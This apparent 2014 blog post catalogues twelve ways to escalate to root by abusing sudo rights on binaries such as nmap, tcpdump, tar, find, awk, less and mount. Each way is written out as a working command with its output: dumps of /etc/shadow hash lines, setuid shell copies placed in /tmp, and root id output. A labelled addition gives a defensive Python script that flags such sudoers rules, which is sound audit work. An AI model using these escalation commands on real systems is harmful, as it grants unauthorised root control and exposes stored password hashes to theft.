Monday, May 19, 2014

Abusing sudo to get root

In some insecure Linux configurations, it is fairly easy to abuse sudo to get a root shell.

You can find out which commands your user is allowed to run as root by calling "sudo -l".

Here are some examples:

1. SUDO NMAP

user@host:~$ sudo nmap -iL /etc/shadow 2>&1 | grep root
Failed to resolve "root:$6$tacLae7v$blr1A8KS2WwHTLgttagiFMgGa94JEkKXVNXAm8a5Lg5vJrdowQTiycwML9M2ibBF6Vu4KZAHcOgOLuqrc6kdn0:16135:0:99999:7:::".
(nmap < 5.35DC1 also has an "--interactive" switch, which drops you to a shell where you can execute commands using the "!cmd" syntax)

2. SUDO FILE

user@host:~$ sudo file -m /etc/shadow
/etc/shadow, 1: Warning: offset `root:$6$5EZeAFXG$V.b3POklvJLNMt0cIEIQecW2Co6cKFUXmDR5bHVjWdsgTJq8URt6m7zBfNFNxdMEZHD7F4esGON.OED88HBPn1:16491:0:99999:7:::' invalid
[... snip ...]

3. SUDO TCPDUMP

user@host:~$ echo -e "cp /bin/sh /tmp/sh_suid\nchmod 7555 /tmp/sh_suid" > tmpfile
user@host:~$ chmod +x tmpfile
user@host:~$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
Maximum file limit reached: 1
user@host:~$ ls -l /tmp/sh_suid 
-r-sr-sr-t 1 root root 117176 May 19 10:14 /tmp/sh_suid
user@host:~$ /tmp/sh_suid
# whoami
root

4. SUDO ZIP

user@host:~$ touch somefile
user@host:~$ sudo zip -q /tmp/test.zip somefile -T -TT '/bin/sh #'
# id
uid=0(root) gid=0(root) groups=0(root)

5. SUDO FIND

user@host:~$ sudo find /dev/null -exec sh \;
# id
uid=0(root) gid=0(root) groups=0(root)

6. SUDO TAR

user@host:~$ touch somefile
user@host:~$ sudo tar cf /dev/null somefile --checkpoint=1 --checkpoint-action=exec=/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

7. SUDO RSYNC

user@host:/tmp$ cat > somefile << EOF
> cp /bin/sh /tmp/sh_root
> chmod a+sx /tmp/sh_root
> EOF
user@host:/tmp$ sudo rsync  -e 'sh /tmp/somefile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
user@host:/tmp$ /tmp/sh_root
# whoami
root

8. SUDO AWK

user@host:~$ sudo awk 'BEGIN {system("/usr/bin/id")}'
uid=0(root) gid=0(root) groups=0(root)

9. SUDO MORE/SUDO LESS

user@host:~$ sudo more /dev/zero
[...]
!bash
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)

10. SUDO (S)FTP

user@host:~$ sudo ftp
ftp> !id
uid=0(root) gid=0(root) groups=0(root)
ftp> 

11. SUDO MOUNT

user@host:~$ sudo mount -o bind /bin/bash /bin/mount
user@host:~$ sudo mount
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)

12. SUDO MAN

user@host:~$ sudo man -P id man
uid=0(root) gid=0(root) groups=0(root)
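As an added audit example (not part of the original post), the following Python script scans a sudoers-style file for rules that let a user run any of the binaries shown above as root, the same entries an admin should hunt for before an attacker does. The sudoers content, user names and Cmnd_Alias are constructed for the demonstration, and the parser only covers the simple one-line grammar used in that sample.

```python
import re
# Binaries this post shows escaping to a root shell (or reading root-only files).
SHELL_ESCAPE_CMDS = {
    "nmap", "file", "tcpdump", "zip", "find", "tar", "rsync", "awk",
    "more", "less", "ftp", "sftp", "mount", "man",
}
# Constructed sudoers sample for the demonstration; not taken from any real host.
SAMPLE_SUDOERS = """\
Defaults env_reset
Cmnd_Alias BACKUP = /bin/tar, /usr/bin/rsync
alice   ALL=(root) NOPASSWD: /usr/bin/nmap, /usr/bin/find
bob     ALL=(ALL) /usr/sbin/service apache2 restart
%ops    ALL=(root) BACKUP, /bin/mount
carol   ALL=(ALL) ALL
"""

def parse_sudoers(text):
    """Return ({alias: [cmds]}, [(user, runas, [cmds])]) for the simple one-line
    grammar above (no backslash continuations, no host or user aliases)."""
    aliases, rules = {}, []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments and whitespace
        if not line or line.startswith("Defaults"):
            continue
        m = re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = [c.strip() for c in m.group(2).split(",")]
            continue
        # user  host=(runas) [TAG:] cmd1, cmd2 ...   (runas defaults to root)
        m = re.match(r"(\S+)\s+\S+\s*=\s*(?:\(([^)]*)\)\s*)?(.+)", line)
        if not m:
            continue
        user, runas, cmdspec = m.group(1), m.group(2) or "root", m.group(3)
        cmdspec = re.sub(r"\b(NOPASSWD|PASSWD|NOEXEC|SETENV):", "", cmdspec)
        rules.append((user, runas, [c.strip() for c in cmdspec.split(",") if c.strip()]))
    return aliases, rules

def risky_entries(text):
    """(user, command) pairs where a root-capable rule grants a shell-escape binary."""
    aliases, rules = parse_sudoers(text)
    findings = []
    for user, runas, cmds in rules:
        if not any(t in ("root", "ALL") for t in re.split(r"[:,\s]+", runas)):
            continue  # this rule cannot run anything as root
        for cmd in (x for c in cmds for x in aliases.get(c, [c])):
            if cmd == "ALL":
                findings.append((user, "ALL (any command; full root)"))
            elif cmd.split()[0].rsplit("/", 1)[-1] in SHELL_ESCAPE_CMDS:
                findings.append((user, cmd))
    return findings
```

Running risky_entries over the real /etc/sudoers (and the files under /etc/sudoers.d) lists the rules to restrict or replace with a tightly scoped wrapper script; the bob entry above is the kind of narrow rule that passes.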
